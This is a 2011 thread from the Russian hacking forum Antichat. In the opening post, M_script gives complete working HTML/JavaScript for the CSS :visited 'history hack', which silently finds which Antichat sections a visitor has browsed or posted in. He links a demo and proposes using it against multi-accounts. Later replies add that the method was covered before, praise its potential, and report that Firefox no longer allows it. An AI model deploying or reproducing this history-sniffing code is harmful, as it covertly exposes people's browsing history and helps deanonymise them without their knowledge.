Авторские статьи CSS History Hack (на примере разделов ачата)

Discussion in 'Статьи' started by M_script, 25 May 2011.

  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Этому методу уже 5 лет и наверное многие его знают, но на форуме я не нашел ни одной темы о нем.
    Метод основан на отличии внешнего вида посещенных ссылок от непосещенных в большинстве браузеров. Это позволяет с помощью JS узнать, какие сайты посещал пользователь.

    Следующий код проверяет, в какие разделы на ачате заходил посетитель сайта и в каких создавал темы.
    PHP:
    <html>
    <
    body>
    <
    style type="text/css">#x a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}</style>

    <script>
    var 
    domains = new Array(    
    'http://forum.antichat.ru/',
    'https://forum.antichat.ru/',
    'http://forum.antichat.net/',
    'https://forum.antichat.net/'
    );

    var 
    forums = new Array();
    forums[0] = new Array(    
    '---',
    '---',
    '---',
    '---',
    '---',
    'ИНФО',
    'Level 7',
    '---',
    '---',
    'Чаты',
    '---',
    '---',
    'ICQ',
    'E-Mail',
    '---',
    'Форумы',
    '---',
    '---',
    '---',
    'АнтиАдмин',
    'Электроника и Фрикинг',
    'Video.Antichat',
    'Мировые новости. Обсуждения.',
    'С/С++, C#, Delphi, .NET, Asm',
    '---',
    '---',
    '---',
    '---',
    '---',
    'Статьи',
    'Авторские статьи',
    'Чужие Статьи',
    '---',
    '---',
    'Оффтоп',
    '---',
    'PHP, PERL, MySQL, JavaScript',
    'Обсуждение Ваших сайтов',
    'Модераторский (Level 7)',
    'ICQ - Покупка, продажа',
    'Безопасность',
    'Windows',
    '*nix',
    'Просьбы о взломах',
    '---',
    'Болталка',
    'Soft - Windows',
    'Soft - *nix',
    'Antichat\'s Quest',
    '---',
    '---',
    'Разное - Покупка, продажа, обмен',
    '---',
    '---',
    '---',
    '---',
    'О Работе',
    'Новости мира "железа"',
    'Сотовый фрикинг',
    '"Железо"',
    'Схемы, программы, прошивки',
    '---',
    'Телефония и связь',
    '---',
    '---',
    'Жалобы и предложения',
    'Правила форума',
    '---',
    '---',
    '---',
    '---',
    'Forum for discussion of ANTICHAT',
    '---',
    'Уязвимости',
    '---',
    'Криптография, расшифровка хешей',
    '---',
    '---',
    '---',
    'Защита ОС:  вирусы, антивирусы, файрволы.',
    'Анонимность',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    'Избранное',
    '---',
    '---',
    'ПО для Web разработчика',
    '---',
    'Реверсинг',
    '---',
    '---',
    'Antichat',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    'Программирование',
    'Проверка на уязвимости',
    'Безопасность и Уязвимости',
    'Квесты',
    'Беспроводные технологии/WPAN/WLAN',
    'Сценарии/CMF/СMS',
    'SЕО/Финансовые задачи/Социальные сети',
    'SЕО - тонкости, методы раскрутки',
    'Белые методы раскрутки',
    'Черные методы раскрутки',
    'Статьи',
    '---',
    '---',
    'Новости форума',
    'Администрирование',
    '*nix системы',
    'Windows системы',
    '---',
    'Партнерки',
    'Level 6',
    'Уязвимости (Level 6)',
    'Релизы (Level 6)',
    '---',
    '---',
    'Социальные сети',
    'Социальные сети',
    '---',
    '---',
    '---',
    '---',
    '---',
    'AntiDDos - АнтиДДОС',
    'Услуги, Покупка и Продажа в SEO',
    'Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.',
    '---',
    'Задания (Level 6)',
    'Хостинги - Hostings',
    'Покупка, Продажа, Обмен',
    'VPN, Proxy, Socks - Покупка, продажа',
    'Хостинг, Dedicated, VDS, Сервера - Покупка, продажа',
    'Инвайты, mails, базы - Покупка, продажа',
    'Мобильная связь, СМС - Покупка, продажа',
    'Трафик, лоады, инсталлы, загрузки - Покупка, продажа',
    'Доступы, shells, ftp - Покупка, продажа',
    'Заявки на модерирование (Level 7)',
    'Закрытые заявки на модерирование (Level 7)',
    'Видео-Конкурс [лето 2010]',
    'Новогодний Видео-Конкурс [2011]',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---',
    '---'
    );
    forums[1] = new Array();
    forums[2] = new Array();

    var 
    newDiv document.createElement('div');
    newDiv.id='x';
    document.body.appendChild(newDiv);
    for(var 
    0200i++)
    {
        for(var 
    04j++)
        {
            var 
    newA document.createElement('a');
            
    newA.href domains[j] + "forum" + (1) + '.html';
            
    newDiv.appendChild(newA);
            if(
    newA.offsetHeight == 1)
            {
                
    forums[1][i] = true;
                
    newDiv.removeChild(newA);
                break;
            }
            
    newDiv.removeChild(newA);
        }
        for(var 
    04j++)
        {
            var 
    newA document.createElement('a');
            
    newA.href domains[j] + "newthread.php?do=newthread&f=" + (1);
            
    newDiv.appendChild(newA);
            if(
    newA.offsetHeight == 1)
            {
                
    forums[2][i] = true;
                
    newDiv.removeChild(newA);
                break;
            }
            
    newDiv.removeChild(newA);
        }
    }

    document.write('Вы посещали разделы:<br>');
    for(var 
    0200i++)
    {
        if(
    forums[1][i] == true)
        {
            
    document.write(    '<a href="http://forum.antichat.ru/forum' 
                            (
    1) + 
                            
    '.html">' 
                            
    forums[0][i] + 
                            
    '</a><br>');
        }
    }

    document.write('<br>Вы создавали темы в разделах:<br>');
    for(var 
    0200i++)
    {
        if(
    forums[2][i] == true)
        {
            
    document.write(    '<a href="http://forum.antichat.ru/forum' 
                            (
    1) + 
                            
    '.html">' 
                            
    forums[0][i] + 
                            
    '</a><br>');
        }
    }
    </script>
        
    </body>
    </html>
    Пример - http://mscript.biz/csshistory/

    Метод может быть использован, как дополнительная защита от мультиаккаунтов, если при регистрации проверять, посещал ли человек страницы, доступные только зарегистрированным пользователям, например:
    /usercp.php?
    /private.php?
    /myip.php
    /forum66.html
    /newthread.php?do=newthread&f=[1-200]
     
    #1 M_script, 25 May 2011
    Last edited: 25 May 2011
    2 people like this.
  2. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    392
    Likes Received:
    247
    Reputations:
    88
    плохо искал. была и не раз)
     
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Искал через гугл:
    history hack site:antichat.ru
    css hack site:antichat.ru
    javascript история браузера site:antichat.ru
    javascript history браузера site:antichat.ru​

    Единственное, что нашел - StartPanic пугает "взломом" истории браузера в мировых новостях.
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Уже 7 лет прошло, тема все еще актуальна, а на ачате до сих пор нет описания и примеров. В паблик.
     
    1 person likes this.
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    На ачате мало сильно знающих эту технику так, как знаешь ее ты! ;) обычные пасивки, активки и не болие того. хотя сама эта уязвимость дает большие перспективы! есть мысли но после того как появится время, это все протестировать...
     
    _________________________
  6. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    пробовал в FF, не работает. Поискал решение, говорят теперь в браузерах стоит запрет на изменение размера шрифта в классе посещенных ссылок. Мол им, теперь, только цвет текста и фона менять можно...
     
    _________________________
Loading...